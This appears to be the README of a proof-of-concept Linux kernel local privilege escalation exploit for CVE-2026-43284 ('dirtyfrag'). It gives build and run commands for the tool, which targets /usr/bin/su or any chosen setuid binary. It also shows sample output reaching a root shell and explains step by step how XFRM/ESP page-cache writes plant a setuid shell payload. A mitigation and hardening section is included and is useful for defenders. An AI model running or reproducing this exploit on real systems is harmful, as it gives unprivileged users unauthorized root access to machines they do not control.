Share
## https://sploitus.com/exploit?id=9B3D53CA-E954-5110-8888-1957B931A61B
# CVE-2026-43284 β 4-byte XFRM/ESP
Proof-of-concept local privilege escalation via XFRM/ESP page-cache corruption
4-byte write primitive Β· 48 iterations Β· 192-byte ELF overwrite Β· unprivileged user + netns
## Proof of concept
Left: kernel preflight, setuid scan, and exploit chain Β·
Right: root shell spawned β id / whoami confirm uid=0(root)
Tested on WSL2 Β· Ubuntu 24.04.1 LTS Β· kernel 6.6.87.2-microsoft-standard-WSL2
```
βββββββββββββββββββββββββββββββββββββββββ
β SLEY - CVE-2026-43284 dirtyfrag PoC β
βββββββββββββββββββββββββββββββββββββββββ
```
> **Disclaimer:** For authorized security research, education, and testing on systems you own or have explicit permission to test only. The authors are not responsible for misuse.
---
## Overview
| | |
|---|---|
| **CVE** | [CVE-2026-43284](https://nvd.nist.gov/vuln/detail/CVE-2026-43284) |
| **Type** | Local privilege escalation (LPE) |
| **Vector** | XFRM / ESP-UDP (`UDP_ENCAP_ESPINUDP`) page-cache corruption |
| **Primitive** | 4 bytes per iteration (ESN `seq_hi`) |
| **Payload** | 192-byte x86_64 ELF (`setuid(0)` + `setgid(0)` + `execve("/bin/sh")`) |
| **Default target** | `/usr/bin/su` |
| **Architecture** | x86_64 only |
| **Privileges required** | Unprivileged user (uses user + network namespaces) |
Works even when `algif_aead` is blacklisted β the exploit uses the kernel XFRM/ESP code path directly.
---
## Features
Built-in preflight checks before exploitation:
1. **Kernel config** β verifies `CONFIG_USER_NS`, `CONFIG_XFRM`, `CONFIG_INET_ESP`
(reads `/boot/config-*`, `/lib/modules/*/config`, or `/proc/config.gz` on WSL2)
2. **Setuid scan** β lists SUID binaries on the system (`find / -perm -4000`)
3. **Exploit** β patches page cache, spawns root shell via PTY, restores target on exit
---
## Requirements
### Kernel options
```text
CONFIG_USER_NS=y
CONFIG_XFRM=y
CONFIG_INET_ESP=m # or =y
```
Quick check:
```bash
# bare metal / VM
grep -E 'CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS=' /boot/config-$(uname -r)
# WSL2
zcat /proc/config.gz | grep -E 'CONFIG_XFRM=|CONFIG_INET_ESP=|CONFIG_USER_NS='
```
### Other
- Linux kernel **vulnerable** to CVE-2026-43284 (see [Patch status](#patch-status))
- `gcc`, `libc`, `libutil` (for `forkpty`)
- Readable **setuid** target binary (default: `/usr/bin/su`)
---
## Build
```bash
git clone https://github.com//CVE-2026-43284.git
cd CVE-2026-43284
make
```
Or manually:
```bash
gcc -O0 -Wall -o sley-dirtyfrag sley-dirtyfrag.c -lutil
```
> `-O0` is intentional β optimization can break timing-sensitive splice/UDP behavior.
---
## Usage
### 1. Confirm you are unprivileged
```bash
id
# uid=1000(youruser) gid=1000(youruser) groups=...
```
### 2. Run the exploit
```bash
./sley-dirtyfrag # default target: /usr/bin/su
./sley-dirtyfrag /usr/bin/passwd # custom setuid binary
```
The tool runs three automated phases:
| Phase | What it does |
|:---:|---|
| **1** | Kernel config preflight (`CONFIG_USER_NS`, `CONFIG_XFRM`, `CONFIG_INET_ESP`) |
| **2** | Full-system setuid binary scan; highlights default target |
| **3** | Backup target β patch page cache (48Γ 4-byte writes) β spawn root shell |
### 3. Verify root access
Inside the spawned shell:
```bash
id
# uid=0(root) gid=0(root) groups=0(root)
whoami
# root
```
### 4. Exit to restore
Press `Ctrl+D` or type `exit`. The PoC drops the page cache so the original on-disk binary is restored automatically.
If restore fails:
```bash
echo 3 | sudo tee /proc/sys/vm/drop_caches
```
### Command reference
| Command | Description |
|---|---|
| `./sley-dirtyfrag` | Exploit `/usr/bin/su` (default) |
| `./sley-dirtyfrag /path/to/suid` | Exploit a custom setuid binary |
| `make` | Build `sley-dirtyfrag` |
| `make clean` | Remove binary |
### Example output
```text
ββ[ phase 1] kernel config preflight
β /proc/config.gz
[+] CONFIG_USER_NS = y (required =y)
[+] CONFIG_XFRM = y (required =y)
[+] CONFIG_INET_ESP = m (required =m or =y)
kernel options OK.
ββ[ phase 2] setuid binary scan
10 /usr/bin/su β target
found 14 setuid binaries.
ββ[ phase 3] exploit
[*] unshare userns+netns, register 48 XFRM SA, spliceβUDP 4500...
[+] corrupt all iterations done
[+] verify ELF patch detected
ββββββββββββββββββββββββββββββββββββββββ
β root shell β exit to restore β
ββββββββββββββββββββββββββββββββββββββββ
```
---
## Mitigation
### Apply the kernel patch (recommended)
| | |
|---|---|
| **Fixed in** | `f4c50a4034e6` (mainline, May 8 2026) |
| **Introduced** | `cac2661c53f3` (Jan 2017) |
**Action:** Upgrade to a distro kernel that includes the fix, or build from a patched mainline tree.
```bash
# check your running kernel
uname -r
# verify fix is present (example β adjust for your distro's package naming)
# apt update && apt install --only-upgrade linux-image-$(uname -r)
```
### Hardening options (defense in depth)
| Measure | Effect |
|---|---|
| **Patch / upgrade kernel** | Eliminates the underlying page-cache write bug |
| **Restrict user namespaces** | Blocks this PoC (requires `CONFIG_USER_NS`) |
| **Remove unneeded setuid binaries** | Reduces viable targets (`chmod u-s`, or uninstall) |
| **Lockdown / LSM (SELinux, AppArmor)** | May limit post-exploitation impact depending on policy |
| **Monitor XFRM + UDP/4500** | Detect anomalous SA registration and ESP-in-UDP traffic from unprivileged namespaces |
#### Restrict unprivileged user namespaces
This exploit depends on `unshare(CLONE_NEWUSER | CLONE_NEWNET)` without root.
```bash
# runtime (may not exist on all kernels)
sysctl kernel.unprivileged_userns_clone=0
# or disable at build time
# CONFIG_USER_NS is not set
```
> **Note:** Disabling user namespaces blocks **this** PoC but not necessarily **CVE-2026-43500** (rxrpc variant for systems without userns).
#### Audit setuid binaries
```bash
find / -perm -4000 -type f 2>/dev/null
# remove or harden binaries you do not need
```
#### Drop caches after suspected compromise
If you believe a setuid binary was patched in memory:
```bash
echo 3 | sudo tee /proc/sys/vm/drop_caches
# re-verify binary integrity from package manager / known-good hash
```
---
## How it works
1. **`unshare(CLONE_NEWUSER | CLONE_NEWNET)`** β isolated user/network namespace (no root needed).
2. **Register 48 XFRM security associations** β shellcode bytes encoded in ESN `seq_hi` (4 bytes per SA).
3. **Trigger via UDP port 4500** with `UDP_ENCAP_ESPINUDP`:
- `splice()` reads the target file into a pipe
- `splice()` moves data from pipe β UDP socket
- Page-cache page enters the ESP scatter-gather list via the `skip_cow` path
- `authencesn` scatterwalk writes `seq_hi` at `assoclen + cryptlen`
4. **HMAC fails** β but the page-cache write **persists**.
5. **Execute the patched setuid binary** β minimal ELF runs `setuid(0)` / `setgid(0)` / `execve("/bin/sh")`.
6. **On shell exit** β drop page cache (`posix_fadvise`) so the kernel reloads the clean file from disk.
---
## Tested environments
| Environment | Kernel |
|---|---|
| WSL2 Ubuntu 24.04.1 LTS | `6.6.87.2-microsoft-standard-WSL2` |
| Ubuntu 24.04 | vulnerable builds |
| Fedora 44 | vulnerable builds |
---
## Related work
- **CVE-2026-43500** β rxrpc variant for systems **without** user namespaces; targets `/etc/passwd` with an 8-byte `pcbc(fcrypt)` brute-force primitive. Not included in this repository.
---
## Files
| File | Description |
|---|---|
| `sley-dirtyfrag.c` | Exploit source |
| `Makefile` | Build helper |
| `proof-of-concept-1.jpg` | PoC screenshot β preflight + exploit |
| `proof-of-concept-2.jpg` | PoC screenshot β root shell verification |
| `README.md` | This file |
---
## License
Provided as-is for research and education. Use responsibly.
---
## Author
**SLEY** β CVE-2026-43284 dirtyfrag PoC
If this helped your research, consider starring the repo.